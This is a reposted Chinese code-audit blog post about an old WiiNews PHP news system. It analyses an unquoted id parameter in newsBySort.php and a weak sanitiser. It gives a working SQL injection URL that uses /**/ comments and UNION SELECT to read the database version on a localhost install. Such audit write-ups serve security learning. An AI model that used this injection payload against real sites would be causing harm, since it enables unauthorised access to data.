码迷,mamicode.com
首页 > 数据库 > 详细

WiiNews新闻系统 SQL注入

时间:2018-05-22 12:51:25      阅读:207      评论:0      收藏:0      [点我收藏+]

标签:cti   注释   pre   func   fun   gic   代码审计   nbsp   图片   

刚开始学习代码审计,根据法师的书本和相关资料进行慢慢开始练手,这里了一款WiiNews老版本针对于练手来讲还是比较简单通俗易懂的系统来做审计!

#1 SQL注入

文件:/newsBySort.php

代码10~18行:

	$sort=sqlReplace(trim($_GET[‘id‘]));    
	$sqlStr="select * from wiinews_newssort where newssort_id=$sort";
	$result = mysql_query($sqlStr) or die ("查询失败,请检查SQL语句。编码号:1007");
	$row = mysql_fetch_array($result);
	if ($row){
		$sortName=$row[‘newssort_name‘];
	}else{
		die ("分类不存在。");
	}

  

$sort=sqlReplace(trim($_GET[‘id‘]));

id参数通过$_GET以后给sqlReplace函数处理、trim函数做是处理首尾处的空白字符。

下面跟进sqlReplace函数:

function sqlReplace($str)
{
   $strResult = $str;
   if(!get_magic_quotes_gpc())
  //如果gpc没有开 { $strResult = addslashes($strResult);
   //编码 } return HTMLEncode($strResult);
  //gpc开的话,返回HTMLEncode() }

$str传输进来判断如果gpc没有开启的话通过php内置函数addslashes()进行处理。如果开启的话则用HTMLEncode来处理。

function HTMLEncode($str){
	if (!empty($str)){
		$str=str_replace("&","&",$str);
		$str=str_replace(">",">",$str);
		$str=str_replace("<","<",$str);
		$str=str_replace(CHR(32)," ",$str);  //空格
		$str=str_replace(CHR(9),"    ",$str);
		$str=str_replace(CHR(9),"    ",$str);
		$str=str_replace(CHR(34),""",$str);  //双引号
		$str=str_replace(CHR(39),"‘",$str);  //单引号
		$str=str_replace(CHR(13),"",$str);
		$str=str_replace(CHR(10),"<br/>",$str);
	}
	return $str;
}

这里只拦截了引号、空格、并没有拦截类似and、select等函数。

技术分享图片

技术分享图片

通过数据库日志记录可以看到空格等相关的转义带入查询、这里可以用/**/注释一句来绕过SQL注入。

 技术分享图片

Url:http://127.0.0.1/WiiNews/newsBySort.php?id=1/**/and/**/1=2/**/union/**/select/**/1,version(),3,4,5,6

技术分享图片

 

WiiNews新闻系统 SQL注入

标签:cti   注释   pre   func   fun   gic   代码审计   nbsp   图片   

原文地址:https://www.cnblogs.com/xsr7yer/p/9070934.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!